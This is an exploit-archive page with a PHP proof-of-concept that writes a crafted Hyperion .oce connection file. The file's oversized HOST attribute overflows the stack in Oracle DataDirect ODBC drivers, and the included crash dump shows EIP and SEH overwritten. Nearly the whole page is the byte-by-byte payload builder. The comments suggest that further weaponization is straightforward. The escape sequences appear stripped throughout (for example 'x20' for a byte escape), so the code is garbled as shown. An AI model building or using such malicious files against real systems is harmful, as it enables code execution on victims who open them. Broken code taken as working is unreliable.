[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC
# Published : 2011-10-31
# Author :
# Previous Title : VLC 1.1.11 (libav) libavcodec_plugin.dll DOS
# Next Title : Google Chrome PoC, killing thread
<?php
/*
Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer
Overflow PoC (*.oce)
by rgod
found a local vector for this:
http://retrogod.altervista.org/9sg_oracle_datadirect.htm
http://www.exploit-db.com/exploits/18007/
This poc will create a suntzu.oce file
which should work against Hyperion Interactive Reporting Studio
which is delivered with Oracle Hyperion Suite.
When clicked a login box appears, on clicking OK an error message
also appears then error then... boom!
description for .oce :
Interactive Reporting database connection file
file association:
"C:OracleMiddleware3EPMSystem11R1productsbiplus\bin\brioqry.exe" "%1"
crash dump, eip and seh overwritten, unicode expanded,
I suppose one should be able to deal with it :
(208.152c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008b ebx=00000000 ecx=0e752eb8 edx=0f490000 esi=0e6b3d60 edi=0012a338
eip=00410043 esp=0012a2d8 ebp=0012a2ec iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
brioqry+0x10043:
00410043 0152ff add dword ptr [edx-1],edx ds:0023:0f48ffff=????????
0:000> g
(208.152c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008b ebx=00000000 ecx=00410041 edx=7c8285f6 esi=00000000 edi=00000000
eip=00410043 esp=00129f10 ebp=00129f30 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
brioqry+0x10043:
00410043 0152ff add dword ptr [edx-1],edx ds:0023:7c8285f5=244c8b00
*/
function _x($x){
global $buff;
list($x) = array_values(unpack('V', $x));
$x = $x + strlen($buff);
$x = pack('V',$x);
return $x;
}
$buff = "mydatabase.com".
str_repeat("x20",16). //cosmetics, no AAAA... inside the login box
str_repeat("x41",4000);
//$dsn="DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;";
//$dsn="DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DATA;UID=sa;PWD=null";
$dsn="DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=;UID=system;PWD=XXXXXXXXX;";
while (!(strlen($dsn)==166)){ //fill the gap
$dsn.="x20";
}
$dsn=str_replace("HOST=;","HOST=".$buff.";",$dsn);
$dump=
"#BRIFx20BIN001".
"x00x00x00x00".
_x("x7bx07x00x00"). //header length, increase counter
"x37x00x00x00". //path length
"D:\Documentsx20andx20Settings\Admin\Desktop\Predefinito.oce".
"x01x00x01x00".
"x00x00x07x00".
"x00x00x0ax00".
"x00x00".
_x("xa6x00x00x00"). //dsn length
$dsn.
"x00x00x00x00".
"x00x00x00x00".
"x04x00x00x00".
"True".
"x00x00x00x00x01x00x00x00x00x00x00x00x00x00".
"x00x00x00x01x00x01x00x00x01x00x00x00x00x00x00x00".
"x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x01x00x00x00@x00x00".
"x00x00x00x00x00x00x00x00@x00x00x00x04x00x00x00x00".
"x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00x00".
"x00x00x00x04x00x00x00x00x00x00x00x00x00x00x00x04".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x04x00x00x00rx00x00x00".
"ColItem.Table".
"x01x00".
"x00x00x04x00x00x00x12x00x00x00".
"ColItem.TableAlias".
"x01x00x00x00x10x00".
"x00x00rx00x00x00".
"ColItem.Owner".
"x01x00x00x00x1cx00x00x00x0cx00x00".
"x00".
"ColItem.Type".
"x01x00x00x00(x00x00x00x03x00x00x00x06x00x00x00".
"Source".
"x01x00x00x00x05x00x00x004x00x00x00x05x00x00x00".
"Where".
"x01".
"x00x00x00x05x00x00x008x00x00x00x07x00x00x00".
"OrderBy".
"x01x00".
"x00x00x05x00x00x00<x00x00x00|x00x00x00x04x00x00x00".
"x00x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00".
"x00x00x00x00x04x00x00x00x00x00x00x00x00x00x00x00".
"x04x00x00x00x00x00x00x00x00x00x00x00x04x00x00x00".
"x00x00x00x00x00x00x00x00x04x00x00x00x00x00x00x00".
"x00x00x00x00x04x00x00x00x00x00x00x00x00x00x00x00".
"x04x00x00x00x00x00x00x00x00x00x00x00x04x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x09x00x00x00x0cx00x00x00ColItem.Namex01x00x00x00".
"x04x00x00x00x10x00x00x00".
"ColItem.ColAlias".
"x01x00x00x00x10x00x00x00".
"x0ex00x00x00".
"ColItem.ColNum".
"x01x00x00x00x1cx00x00x00x0fx00x00x00".
"ColItem.ColType".
"x01x00x00x00(x00x00x00x10x00x00x00".
"ColItem.NumBytes".
"x01x00x00x004x00".
"x00x00x0ex00x00x00".
"ColItem.Places".
"x01x00x00x00@x00x00x00x0ex00x00".
"x00".
"ColItem.Digits".
"x01x00x00x00Lx00x00x00rx00x00x00".
"ColItem.Nulls".
"x01x00x00x00Xx00".
"x00x00x12x00x00x00".
"ColItem.NativeType".
"x01x00x00x00dx00x00x00x03x00x00".
"x00x06x00x00x00".
"Source".
"x01x00x00x00x05x00x00x00px00x00x00".
"x05x00x00x00".
"Where".
"x01x00x00x00x05x00x00x00tx00x00x00x07".
"x00x00x00".
"OrderBy".
"x01x00x00x00x05x00x00x00xx00x00x000x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x0bx00x00x00x06x00x00x00".
"PTable".
"x01x00x00x00x05x00x00".
"x00x04x00x00x00x06x00x00x00".
"POwner".
"x01x00x00x00x05x00x00".
"x00x08x00x00x00x07x00x00x00".
"PDBName".
"x01x00x00x00x05x00x00".
"x00x0cx00x00x00x08x00x00x00".
"PColName".
"x01x00x00x00x05x00x00".
"x00x10x00x00x00x06x00x00x00".
"FTable".
"x01x00x00x00x05x00x00".
"x00x14x00x00x00x06x00x00x00".
"FOwner".
"x01x00x00x00x05x00x00".
"x00x18x00x00x00x07x00x00x00".
"FDBName".
"x01x00x00x00x05x00x00".
"x00x1cx00x00x00x08x00x00x00".
"FColName".
"x01x00x00x00x05x00x00".
"x00x20x00x00x00x06x00x00x00".
"SeqKey".
"x01x00x00x00x05x00x00".
"x00$x00x00x00x06x00x00x00".
"Source".
"x01x00x00x00x05x00x00x00".
"(x00x00x00x05x00x00x00".
"Where".
"x01x00x00x00x05x00x00x00,x00".
"x00x00)x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00n".
"x00x00".
"x00x09x00x00x00".
"SrcDBName".
"x01x00x00x00x05x00x00x00x04x00x00".
"x00x08x00x00x00".
"SrcOwner".
"x01x00x00x00x05x00x00x00x08x00x00".
"x00x08x00x00x00".
"SrcTable".
"x01x00x00x00x05x00x00x00x0cx00x00".
"x00x08x00x00x00".
"LookupID".
"x01x00x00x00x05x00x00x00x10x00x00".
"x00x0bx00x00x00".
"ColumnValue".
"x01x00x00x00x05x00x00x00x14x00x00".
"x00x11x00x00x00".
"ColumnDescription".
"x01x00x00x00x05x00x00x00x18x00x00".
"x00x0cx00x00x00".
"LimitMapFrom".
"x01x00x00x00x05x00x00x00x1cx00x00".
"x00rx00x00x00".
"LimitMapWhere".
"x01x00x00x00x05x00x00x00x20x00x00x00".
"x0bx00x00x00".
"LookupWhere".
"x01x00x00x00x05x00x00x00$x00x00x00x0e".
"x00x00x00".
"IsCustomLookup".
"x01x00x00x00x01x00x00x00(x00x00x00x04x00".
"x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00".
"x01x08x00x00x00x00x00x00x00x00x00x00x00x01x00x00".
"x00x0cx00x00x00".
"NumTableTabs".
"x01x00x00x00x03x00x00x00x04x00x00".
"x00x08x00x00x00x00x00x00x00x00x00x00x00x01x00x00".
"x00rx00x00x00".
"NumColumnTabs".
"x01x00x00x00x03x00x00x00x04x00x00x00".
"x8ax00x00x00x17x00x00x00yyyy-mm-ddx20HH:MM:SS.fffx17x00x00x00yyyy-mm-ddx20HH:MM:SS.fffx17x00".
"x00x00yyyy-mm-ddx20HH:MM:SS.fffn".
"x00x00x00yyyy-mm-ddx08x00x00x00HH:MM:SSx17x00x00x00yyyy-mm-ddx20HH:MM:SS.fffx00".
"x00x00x00x01x00x00x00x08x00x00x00DateAttrx06x00x00x00x05".
"x00x00x00x04x00x00x00x08x00x00x00x12x00x00x00".
"TableCat.DaOCEPref".
"x01x00x00x00".
_x("Nx01x00x00").
"x10x00x00x00".
"ColCat.DaOCEPref".
"x01x00x00x00".
_x("@x02x00x00").
"x11x00x00x00".
"FKeyCat.DaOCEPref".
"x01x00x00x00".
_x("xf6x03x00x00").
"x15x00x00x00".
"LimitMapSQL.DaOCEPref".
"x01x00x00x00".
_x("%x05x00x00").
"x15x00x00x00".
"TableFilter.DaOCEPref".
"x01x00x00x00".
_x("ex06x00x00").
"x15x00x00x00".
"TableRemarks.DMParams".
"x01x00x00x00".
_x("xx06x00x00").
"x16x00x00x00".
"ColumnRemarks.DMParams".
"x01x00x00x00".
_x("xa4x06x00x00").
"x14x00x00x00".
"DateFormats.DMParams".
"x01x00x00x00".
_x("xd1x06x00x00").
":x00x00x00".
"x0ex00x00x00".
"OpenCatalogExt".
"x01x00x00x00".
"x05x00x00x00".
"x04x00x00x00".
"x06x00x00x00".
"IsUTF8".
"x01x00x00x00".
"x01x00x00x00".
"?x00x00x00".
"x07x00x00x00".
"SavePwd".
"x01x00x00x00".
"x01x00x00x00".
"@x00x00x00".
"x08x00x00x00".
"ConnType".
"x01x00x00x00".
"x03x00x00x00".
"Ax00x00x00".
"x07x00x00x00".
"ApiCode".
"x01x00x00x00".
"x03x00x00x00".
"Ex00x00x00".
"x07x00x00x00".
"SvrCode".
"x01x00x00x00".
"x03x00x00x00".
"Ix00x00x00".
"x08x00x00x00".
"Extra1_1".
"x01x00x00x00".
"x05x00x00x00".
"Mx00x00x00".
"x06x00x00x00".
"CurrDB".
"x01x00x00x00".
"x05x00x00x00".
_x("xf7x00x00x00").
"x06x00x00x00".
"DBList".
"x01x00x00x00".
"x05x00x00x00".
_x("xfbx00x00x00").
"rx00x00x00".
"MetaData_Save".
"x01x00x00x00".
"x05x00x00x00".
_x("xffx00x00x00").
"x0bx00x00x00".
"MetaDataKey".
"x01x00x00x00".
"x03x00x00x00".
_x("x07x01x00x00").
"x12x00x00x00".
"InformaticaWritten".
"x01x00x00x00".
"x01x00x00x00".
_x("x0bx01x00x00").
"x0cx00x00x00".
"SelectCommit".
"x01x00x00x00".
"x03x00x00x00".
_x("x0cx01x00x00").
"x0bx00x00x00".
"DBCancelOpt".
"x01x00x00x00".
"x03x00x00x00".
_x("x10x01x00x00").
"nx00x00x00".
"StringMode".
"x01x00x00x00".
"x01x00x00x00".
_x("x14x01x00x00").
"x0bx00x00x00".
"EdaHardQuit".
"x01x00x00x00".
"x01x00x00x00".
_x("x15x01x00x00").
"x08x00x00x00".
"DisTrans".
"x01x00x00x00".
"x01x00x00x00".
_x("x16x01x00x00").
"x08x00x00x00".
"UpdValid".
"x01x00x00x00".
"x01x00x00x00".
_x("x17x01x00x00").
"nx00x00x00".
"UseODBCDlg".
"x01x00x00x00".
"x01x00x00x00".
_x("x18x01x00x00").
"x09x00x00x00".
"JoinInfoQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x19x01x00x00").
"nx00x00x00".
"GuessJoinQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x1ax01x00x00").
"x0bx00x00x00".
"CustomJoinQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x1bx01x00x00").
"x0bx00x00x00".
"CustTblQryQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x1cx01x00x00").
"x09x00x00x00".
"FastModeQ".
"x01x00x00x00".
"x01x00x00x00".
_x("x1dx01x00x00").
"nx00x00x00".
"CurrOCETab".
"x01x00x00x00".
"x03x00x00x00".
_x("x1ex01x00x00").
"x07x00x00x00".
"CurrTab".
"x01x00x00x00".
"x03x00x00x00".
_x(""x01x00x00").
"rx00x00x00".
"CurrRepManTab".
"x01x00x00x00".
"x03x00x00x00".
_x("&x01x00x00").
"x0ex00x00x00".
"UseODBCDBNameQ".
"x01x00x00x00".
"x01x00x00x00".
_x("*x01x00x00").
"nx00x00x00".
"UseTblSqlQ".
"x01x00x00x00".
"x01x00x00x00".
_x("+x01x00x00").
"x07x00x00x00".
"QuotedQ".
"x01x00x00x00".
"x01x00x00x00".
_x(",x01x00x00").
"x09x00x00x00".
"ChangeDBQ".
"x01x00x00x00".
"x01x00x00x00".
_x("-x01x00x00").
"rx00x00x00".
"SaveUserNameQ".
"x01x00x00x00".
"x01x00x00x00".
_x(".x01x00x00").
"x0cx00x00x00".
"UseTimeLimit".
"x01x00x00x00".
"x01x00x00x00".
_x("/x01x00x00").
"x09x00x00x00".
"TimeLimit".
"x01x00x00x00".
"x03x00x00x00".
_x("0x01x00x00").
"x0cx00x00x00".
"AllowNonJoin".
"x01x00x00x00".
"x01x00x00x00".
_x("4x01x00x00").
"x07x00x00x00".
"MDDMode".
"x01x00x00x00".
"x01x00x00x00".
_x("5x01x00x00").
"nx00x00x00".
"PacketSize".
"x01x00x00x00".
"x03x00x00x00".
_x("6x01x00x00").
"x0cx00x00x00".
"DisableAsync".
"x01x00x00x00".
"x01x00x00x00".
_x(":x01x00x00").
"x06x00x00x00".
"IsHPIW".
"x01x00x00x00".
"x01x00x00x00".
_x(";x01x00x00").
"x10x00x00x00".
"RetainDateFormat".
"x01x00x00x00".
"x01x00x00x00".
_x("<x01x00x00").
"x10x00x00x00".
"AdvSetOperations".
"x01x00x00x00".
"x01x00x00x00".
_x("=x01x00x00").
"x10x00x00x00".
"MemberProperties".
"x01x00x00x00".
"x01x00x00x00".
_x(">x01x00x00").
"x1cx00x00x00".
"UseOracleOuterJoinOpOnLimits".
"x01x00x00x00".
"x01x00x00x00".
_x("?x01x00x00").
"x18x00x00x00".
"UseODBCOuterJoinOnLimits".
"x01x00x00x00".
"x01x00x00x00".
_x("@x01x00x00").
"x16x00x00x00".
"UseODBCOuterJoinSyntax".
"x01x00x00x00".
"x01x00x00x00".
_x("Ax01x00x00").
"x10x00x00x00".
"OracleBufferSize".
"x01x00x00x00".
"x03x00x00x00".
_x("Bx01x00x00").
"x08x00x00x00".
"CustTblQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Fx01x00x00").
"x08x00x00x00".
"CustColQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Gx01x00x00").
"x0cx00x00x00".
"FilterOwnerQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Hx01x00x00").
"x0cx00x00x00".
"FilterTableQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Ix01x00x00").
"x0bx00x00x00".
"FilterTypeQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Jx01x00x00").
"x0cx00x00x00".
"DefineTableQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Kx01x00x00").
"x0cx00x00x00".
"DefineOwnerQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Lx01x00x00").
"x0bx00x00x00".
"DefineTypeQ".
"x01x00x00x00".
"x01x00x00x00".
_x("Mx01x00x00").
"x15x00x00x00".
"FilterBRIOTblsSetting".
"x01x00x00x00".
"x01x00x00x00".
_x("qx06x00x00").
"x19x00x00x00".
"UseDifferentRepConnection".
"x01x00x00x00".
"x01x00x00x00".
_x("rx06x00x00").
"x11x00x00x00".
"MetaDataOwnerName".
"x01x00x00x00".
"x05x00x00x00".
_x("sx06x00x00").
"x09x00x00x00".
"AdvOption".
"x01x00x00x00".
"x01x00x00x00".
_x("wx06x00x00").
"x00";
file_put_contents("suntzu.oce",$dump);
?>